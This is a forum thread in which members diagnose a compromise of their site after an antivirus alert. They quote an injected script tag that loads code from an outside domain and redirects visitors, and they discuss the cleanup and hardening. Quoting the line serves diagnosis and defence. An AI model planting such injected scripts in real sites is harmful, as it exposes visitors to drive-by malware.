Topic: My anti virus program keeps saying there's a virus here.

[Wario Bros]

When on get on this forums, my anti virus program keeps making a pop-up saying there is a virus threat called "HTML/ScrInject.B.Gen virus."  I tell it to delete it but when I click on another section of the forums, that same warning message comes up.  Is this just me or is it happening to someone else as well?

[bustin98]

What page is doing this?

[marioman]

All of them.  I just sent you a PM about this.

[Revned]

Hmm. At the very end of every page, after the </html> tag, is the following:

<script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>

which redirects to http://www3.workfree36-td.xorg.pl based on your cookies. This domain times out on me, so I can't tell what it is.

EDIT: The kdjkfjskdfjlskdjf.com site is timing out for me now, so every page on the forums tries to load forever.

[bustin98]

Either my AntiVirus is disabling it or IE8 is. I am not having any issues with the site, but I do see the code. Working on it now. Seems like it is embeded in the code.

[Revned]

The script only does something the first time you view it. It adds a cookie, then sends you to the other site. From then on it sees that you have a cookie already and does nothing

The real question is how this is happening in the first place. It's not being appended with JavaScript, because it's there even if I get the page with plain old wget. This sounds almost like they somehow edited the site's PHP source :-S


EDIT: Alright, everyone is safe. The site it redirects you to further redirects you to "QoogleSearch.com", which has been de-listed:

   Domain Name: QOOGLESEARCH.COM
   Registrar: GODADDY.COM, INC.
   Whois Server: whois.godaddy.com
   Referral URL: http://registrar.godaddy.com
   Name Server: NS1.SUSPENDED-FOR.SPAM-AND-ABUSE.COM
   Name Server: NS2.SUSPENDED-FOR.SPAM-AND-ABUSE.COM
   Status: ok
   Updated Date: 27-apr-2010
   Creation Date: 21-jan-2010
   Expiration Date: 21-jan-2011

[Peardian]

That's the infection I was talking about. And it looks like the script is still there at the bottom of the page. The site gives you a virus, or it did before it was shut down.

[bustin98]

I overwrote the source code with the original files, hence the current lack of ads at the footer. No luck in removing it though. Currently creating a new directory with a completely fresh install, importing the DB now.

EDIT: Ok, everything is switched over to a completely fresh install with the old DB imported in. Anyone see anything off? Let me know.

[Wario Bros]

That's good to hear!  BTW, I no longer get that virus message anymore.  I'm kinda surprised how fast this was handled. 

[Revned]

Did you save the infected files for further inspection? This might just happen again if you don't find the cause.

[bustin98]

Doesn't seem fast to me... 4 hours of trying stuff just to let it come down to a fresh install. Still will be looking at the old files to see if I can't find what was changed in case it happens again.

EDIT: We are thinking the same.

[Maxim]

If you have any files or directories that are world-writeable then other people on your shared server can drop files or add exploits. Also, any vulnerabilities in the forum will get you targeted, the best mitigation being to make some non-standard modifications (e.g. moving form fields around, hiding the version number) to make it harder to script and/or Google for.

(I've had to deal with these kinds of problems for a while... the only real solution is to run custom software, on a private server, and either not be big enough to get targeted or have really robust software. Also, daily backups of the files and DB.)

[Maxim]

Also, some of the attachments/avatars have been corrupted. My avatar has had two bytes removed, for example.

[bustin98]

Sorry Maxim. It doesn't look like I can do anything about the avatars. You'll have to reload it back up.

[Revned]

Not that avatars are a chief concern, but don't you have backups? My avatar and several others' have disappeared, and it makes me concerned that other things might be corrupted.